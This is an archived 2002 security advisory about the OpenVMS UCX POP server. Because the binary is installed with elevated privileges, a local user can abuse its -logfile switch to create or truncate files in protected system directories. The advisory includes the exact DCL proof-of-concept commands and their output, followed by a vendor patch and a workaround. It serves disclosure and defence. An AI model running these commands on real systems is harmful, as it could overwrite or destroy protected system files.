Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: Various Flavours :: misc5711.htm

OpenVMS POP server permits local file to be overwritten



26th Sep 2002 [SBWID-5711]
COMMAND

	OpenVMS POP server permits local file to be overwritten

SYSTEMS AFFECTED

	TCPIP$POP_SERVER.EXE V5.3-18B

PROBLEM

	Mike         Riley         [mike@akita.co.uk]          of          Akita
	[http://www.akita-security.co.uk] says :
	

	--snipp--
	

	The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE,  is  installed
	with the VMS privileges BYPASS and SYSPRV:
	

	INSTALL> list ucx$pop_server.exe /full

	

	DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE

	   UCX$POP_SERVER;1               Prv

	        Entry access count         = 1

	        Privileges = SYSPRV BYPASS

	

	INSTALL>

	

	The BYPASS privilege  allows  the  pop  server  to  override  filesystem
	permissions. By use of the -logfile commandline switch, it  is  possible
	to persuade the server to open  a  file  anywhere,  or  to  truncate  an
	existing file, as follows:
	

	

	$ show process/privs

	

	25-SEP-2002 10:47:35.02   User: MIKE             Process ID:

	0000013F

	                          Node: VAX              Process name:

	"_TNA21:_1"

	

	Authorized privileges:

	 NETMBX    TMPMBX

	

	Process privileges:

	 NETMBX               may create network device

	 TMPMBX               may create temporary mailbox

	

	Process rights:

	 INTERACTIVE

	 REMOTE

	

	System rights:

	 SYS$NODE_VAX

	$

	$ break_it :== $sys$system:ucx$pop_server.exe

	$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE

	19102-09-24 17:41:39 sizeof(block_wait_times) 160

	19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32

	19102-09-24 17:41:40 num_elems 5

	[SNIP]

	^C

	$ dir/prot sys$system:I_*

	

	Directory SYS$SYSROOT:[SYSEXE]

	

	I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1

	                   insufficient privilege or object protection

	violation

	

	Total of 1 file.

	$

	____________________________________________________________________

	

	The file created looks like this:

	____________________________________________________________________

	

	Directory SYS$SYSROOT:[SYSEXE]

	

	I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1       File ID:  (9499,485,0)

	Size:            0/0          Owner:    [SYSTEM]

	Created:   24-SEP-2002 17:41:41.14

	Revised:   24-SEP-2002 17:41:57.09 (1)

	Expires:   <None specified>

	Backup:    <No backup recorded>

	Effective: <None specified>

	Recording: <None specified>

	File organization:  Sequential

	Shelved state:      Online

	File attributes:    Allocation: 0, Extend: 0, Global buffer count: 0

	                    No version limit

	Record format:      Stream_LF, maximum 0 bytes, longest 32767 bytes

	Record attributes:  Carriage return carriage control

	RMS attributes:     None

	Journaling enabled: None

	File protection:    System:RWED, Owner:RWED, Group:RE, World:

	Access Cntrl List:  None

	

	Total of 1 file, 0/0 blocks.

	$

	

	

	--snipp--

SOLUTION

	 Patch

	 =====

	

	Compaq have released an ECO which corrects the problem:
	

	ECO B 1-JUL-2002 Alpha and VAX

	

	 Workaround

	 ==========

	 

	Remove world execute permissions for the pop server binary.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH